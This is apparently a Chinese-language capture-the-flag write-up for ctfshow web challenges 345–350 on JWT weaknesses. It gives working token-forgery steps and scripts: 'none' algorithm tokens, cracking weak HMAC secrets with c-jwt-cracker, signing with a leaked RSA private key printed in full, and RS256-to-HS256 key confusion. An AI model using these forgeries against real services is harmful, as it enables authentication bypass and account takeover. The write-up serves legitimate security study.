jwt令牌由三部分组成，由.分割

Header
Payload
Signature

header示例

{'typ': 'JWT','alg': 'HS256'
}# typ：声明类型
# alg：声明加密的算法 通常直接使用 HMAC SHA256
需要注意的是因为header部分是固定的所以，生成的base64也是固定的以eyJh开头的

payload示例

{"sub": "1234567890","name": "John Doe"
}标准中注册的声明 (建议但不强制使用) 
# iss: jwt签发者
# sub: jwt所面向的用户
# aud: 接收jwt的一方
# exp: jwt的过期时间，这个过期时间必须要大于签发时间
# nbf: 定义在什么时间之前，该jwt都是不可用的
# iat: jwt的签发时间
# jti: jwt的唯一身份标识，主要用来作为一次性token,从而回避重放攻击

signature
是一个签证信息，这个签证信息由三部分组成header (base64后的)
payload (base64后的)
secret注意：secret是保存在服务器端的，JWT的签发生成也是在服务器端的，secret就是用来进行JWT的签发和JWT的验证

在线jwt工具

web345

没有加密只能手动编码

{"alg": "None","typ": "jwt"
}
ewogICJhbGciOiAiTm9uZSIsCiAgInR5cCI6ICJqd3QiCn0
[{"sub": "admin"}
]
WwogIHsKICAgIAogICAgInN1YiI6ICJhZG1pbiIKICB9Cl0

这样修改之后是不太好改的至少我的电脑是这样，然后header和signature没有所以我们直接传需要验证的那一段即可

cookie：
WwogIHsKICAgIAogICAgInN1YiI6ICJhZG1pbiIKICB9Cl0

web346

我们要把加密换成none，user换成admin，使用脚本

import base64
def jwtBase64Encode(x):return base64.b64encode(x.encode('utf-8')).decode().replace('+', '-').replace('/', '_').replace('=', '')
header = '{"typ":"JWT","alg":"none"}'
payload = '{"iss":"admin","iat":1717308697,"exp":1717315897,"nbf":1632212749,"sub":"admin",' \'"jti":"ef284a95660debcc71201fbd57541e07"} 'print(jwtBase64Encode(header)+'.'+jwtBase64Encode(payload)+'.')

然后就可以了

web347

不能改none了我发现只能爆密钥但是不知道为啥我就是爆不出来，既然是弱的就猜一个123456对了刚好

cd c-jwt-cracker-master./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNzMyOTk2NywiZXhwIjoxNzE3MzM3MTY3LCJuYmYiOjE3MTczMjk5NjcsInN1YiI6InVzZXIiLCJqdGkiOiIxZTA5YTdmODJmM2NhZTJiOGQ4MjU4N2I1ZTI4NTcwMCJ9.3mUyUCWS0vkgEEyDVYY_kuzVzT5qvCCIneHUn1ic4Qo

web348

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNzMzMjU2OCwiZXhwIjoxNzE3MzM5NzY4LCJuYmYiOjE3MTczMzI1NjgsInN1YiI6InVzZXIiLCJqdGkiOiIwZTZiMmRjM2RmZTRjOWM3ZWM3YjM2YzFlNTI4ODk4MCJ9.3UFCVH-G-__fqZvFVdN8wWmxR54Uoi38Hnj-Sp1sv0Q

这个一秒就出了

web349

/* GET home page. */
router.get('/', function(req, res, next) {res.type('html');var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });res.cookie('auth',token);res.end('where is flag?');});router.post('/',function(req,res,next){var flag="flag_here";res.type('html');var auth = req.cookies.auth;var cert = fs.readFileSync(process.cwd()+'//public/public.key');  // get public keyjwt.verify(auth, cert, function(err, decoded) {if(decoded.user==='admin'){res.end(flag);}else{res.end('you are not admin');}});
});

审计上面的代码发现在public.key有公钥
扫后台发现私钥

-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDNioS2aSHtu6WIU88oWzpShhkb
+r6QPBryJmdaR1a3ToD9sXDbeni5WTsWVKrmzmCk7tu4iNtkmn/r9D/bFcadHGnX
YqlTJItOdHZio3Bi1J2Elxg8IEBKx9g6RggTOGXQFxSxlzLNMRzRC4d2PcA9mxjA
bG1Naz58ibbtogeglQIDAQAB
-----END PUBLIC KEY-----

-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDNioS2aSHtu6WIU88oWzpShhkb+r6QPBryJmdaR1a3ToD9sXDb
eni5WTsWVKrmzmCk7tu4iNtkmn/r9D/bFcadHGnXYqlTJItOdHZio3Bi1J2Elxg8
IEBKx9g6RggTOGXQFxSxlzLNMRzRC4d2PcA9mxjAbG1Naz58ibbtogeglQIDAQAB
AoGAE+mAc995fvt3zN45qnI0EzyUgCZpgbWg8qaPyqowl2+OhYVEJq8VtPcVB1PK
frOtnyzYsmbnwjZJgEVYTlQsum0zJBuTKoN4iDoV0Oq1Auwlcr6O0T35RGiijqAX
h7iFjNscfs/Dp/BnyKZuu60boXrcuyuZ8qXHz0exGkegjMECQQD1eP39cPhcwydM
cdEBOgkI/E/EDWmdjcwIoauczwiQEx56EjAwM88rgxUGCUF4R/hIW9JD1vlp62Qi
ST9LU4lxAkEA1lsfr9gF/9OdzAsPfuTLsl+l9zpo1jjzhXlwmHFgyCAn7gBKeWdv
ubocOClTTQ7Y4RqivomTmlNVtmcHda1XZQJAR0v0IZedW3wHPwnT1dJga261UFFA
+tUDjQJAERSE/SvAb143BtkVdCLniVBI5sGomIOq569Z0+zdsaOqsZs60QJAYqtJ
V7EReeQX8693r4pztSTQCZBKZ6mJdvwidxlhWl1q4+QgY+fYBt8DVFq5bHQUIvIW
zawYVGZdwvuD9IgY/QJAGCJbXA+Knw10B+g5tDZfVHsr6YYMY3Q24zVu4JXozWDV
x+G39IajrVKwuCPG2VezWfwfWpTeo2bDmQS0CWOPjA==
-----END RSA PRIVATE KEY-----

const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)

我不能用在线网页了，只能用node.js来写
或者用python

import jwt
private = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=private, algorithm='RS256'))

用bp发包，这里我就是忘了一个错误，应该是POST发包，别忘了上面的js文件说的是POST查看

web350

user.js

module.exports = {items: [{username: 'CTFSHOW', password: '123456'}]
};

common.js

module.exports = {copy:copy
};function copy(object1, object2){for (let key in object2) {if (key in object2 && key in object1) {copy(object1[key], object2[key])} else {object1[key] = object2[key]}}}

var express = require('express');
var router = express.Router();
var jwt = require('jsonwebtoken');
var fs = require('fs');/* GET home page. */
router.get('/', function(req, res, next) {res.type('html');var privateKey = fs.readFileSync(process.cwd()+'//routes/private.key');var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });res.cookie('auth',token);res.end('where is flag?');});router.post('/',function(req,res,next){var flag="flag_here";res.type('html');var auth = req.cookies.auth;var cert = fs.readFileSync(process.cwd()+'//routes/public.key');  // get public keyjwt.verify(auth, cert,function(err, decoded) {if(decoded.user==='admin'){res.end(flag);}else{res.end('you are not admin'+err);}});
});
module.exports = router;

公钥

-----CTFSHOW 36D BOY -----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDfdIGdsPuxSGPuosgarjZ7zO4t
HHmQ7+6WUiKBA0ykcXe6aK9zcVVKCcEwyMbENgTF4Et8RjZ3NKs1Co74Q+4gII5G
IgQFSS0PzTOKmoTY1fnA6+jqBquV4RnU283kgdaKmkaSRdiwsW2EaagMgZdG6WJk
65RmH98bgnIAGW5nawIDAQAB
-----END PUBLIC KEY-----

公钥给我们了，我们可以利用非对称转为对称算法进行攻击，利用公钥进行加密解密
RS256->HS256

const jwt = require('jsonwebtoken');  //导入库
var fs = require('fs');  //导入js库方便读文件操作
var privateKey = fs.readFileSync('./public.key');  
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });  把RS256改为HS256就可以用公钥解出来
console.log(token)  最后的cookie